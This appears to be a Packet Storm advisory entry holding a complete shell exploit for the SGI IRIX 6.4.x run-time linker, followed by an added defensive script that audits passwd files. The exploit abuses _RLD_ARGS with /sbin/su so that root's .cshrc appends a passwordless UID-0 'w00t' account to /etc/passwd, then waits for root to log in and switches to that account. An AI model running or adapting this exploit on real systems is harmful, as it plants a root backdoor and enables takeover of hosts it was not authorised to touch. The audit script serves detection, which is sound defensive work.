SGI IRIX 6.4.x Run-Time Linker Arbitrary File Creation

2019-04-28T00:00:00
ID PACKETSTORM:152657
Type packetstorm
Reporter Hacker Fantastic
Modified 2019-04-28T00:00:00

Description

```sh
#!/bin/sh
# SGI IRIX <= 6.4.x run-time linker (rld) arbitrary file creation exploit
# =======================================================================
# The IRIX run-time linker on all versions prior to 6.5 does not properly
# scrub environment variables when executing binaries with privilege or
# capabilities. A malicious user can leverage this to create files as the
# "root" user and partially control the contents.
#
# -- HackerFantastic (https://hacker.house)
#
echo "echo w00t::0:0:greetz:/:/bin/csh >> /etc/passwd" > /tmp/.x.sh
chmod 755 /tmp/.x.sh
_RLD_ARGS="-log /.cshrc |/tmp/.x.sh" /sbin/su
last -3 root
echo "[ waiting 5mins for root to login..."
sleep 300
su - w00t
```
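The script above ends by appending a passwd entry with UID 0 and an empty password field. The following is an added defensive example, not part of the original advisory: a POSIX sh audit that flags such entries in a passwd-format file. The function names `audit_passwd` and `sample_passwd` are hypothetical, and the sample data is constructed (its `w00t` line is the one written by the script above).

```sh
#!/bin/sh
# Added example (not from the advisory): audit a passwd-format file for
# entries like the one the script above appends to /etc/passwd.

# audit_passwd FILE   (use "-" to read standard input)
# Prints one finding per line as "<reason>:<login>".
# Exit status is 1 if anything was flagged, 0 otherwise.
audit_passwd() {
    awk -F: '
        /^[ \t]*$/ { next }                  # skip blank lines
        # Any login other than "root" that maps to UID 0
        $3 ~ /^0+$/ && $1 != "root" { print "uid0:" $1; bad = 1 }
        # Empty password field: the account needs no password
        $2 == ""                    { print "nopass:" $1; bad = 1 }
        END { exit (bad ? 1 : 0) }
    ' "$1"
}

# Constructed sample input: two ordinary entries plus the entry that the
# script above writes.
sample_passwd() {
    cat <<'EOF'
root:x:0:0:Super-User:/:/bin/csh
lp:x:9:9:Print Spooler Owner:/var/spool/lp:/bin/sh
w00t::0:0:greetz:/:/bin/csh
EOF
}

# Demonstration on the constructed sample; prints:
#   uid0:w00t
#   nopass:w00t
sample_passwd | audit_passwd - || true
```

On a live host, run `audit_passwd /etc/passwd`; any `uid0:` finding for an account that was not deliberately provisioned warrants checking root's shell startup files and recent root logins.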